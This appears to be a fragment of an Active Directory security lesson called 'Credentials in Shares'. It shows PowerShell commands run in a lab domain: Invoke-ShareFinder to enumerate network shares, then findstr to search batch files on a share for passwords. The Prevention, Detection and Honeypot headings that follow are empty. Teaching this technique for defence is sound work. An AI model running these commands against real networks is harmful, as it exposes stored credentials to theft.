Credentials in Shares
Attack
PS C:\Users\bob\Downloads> Invoke-ShareFinder -domain eagle.local -ExcludeStandard -CheckShareAccess\\DC2.eagle.local\NETLOGON - Logon server share
\\DC2.eagle.local\SYSVOL - Logon server share
\\WS001.eagle.local\Share -
\\WS001.eagle.local\Users -
\\Server01.eagle.local\dev$ -
\\DC1.eagle.local\NETLOGON - Logon server share
\\DC1.eagle.local\SYSVOL - Logon server sharePS Microsoft.PowerShell.Core\FileSystem::\\Server01.eagle.local\dev$> findstr /m /s /i "pass" *.batPrevention
Detection
Honeypot
Last updated